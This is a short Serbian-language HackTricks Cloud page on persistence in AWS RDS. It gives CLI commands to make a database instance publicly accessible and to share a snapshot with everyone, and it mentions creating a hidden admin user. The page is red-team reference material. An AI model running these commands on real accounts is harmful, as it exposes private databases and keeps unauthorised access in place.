AWS - RDS Perzistencija

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pogledajte subscription plans!

Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.

Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

RDS

Za više informacija pogledajte:

AWS - Relational Database (RDS) Enum

Omogućavanje javnog pristupa instanci: `rds:ModifyDBInstance`

Napadač sa ovom dozvolom može izmeniti postojeću RDS instancu kako bi omogućio javni pristup.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Kreirajte admin korisnika unutar DB

Napadač može jednostavno kreirati korisnika unutar DB, tako da, čak i ako je lozinka master naloga promenjena, on ne izgubi pristup bazi podataka.

Učinite snapshot javnim

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pogledajte subscription plans!

Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.

Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

HackTricks Cloud

AWS - RDS Perzistencija

RDS

Omogućavanje javnog pristupa instanci: rds:ModifyDBInstance

Kreirajte admin korisnika unutar DB

Učinite snapshot javnim

Omogućavanje javnog pristupa instanci: `rds:ModifyDBInstance`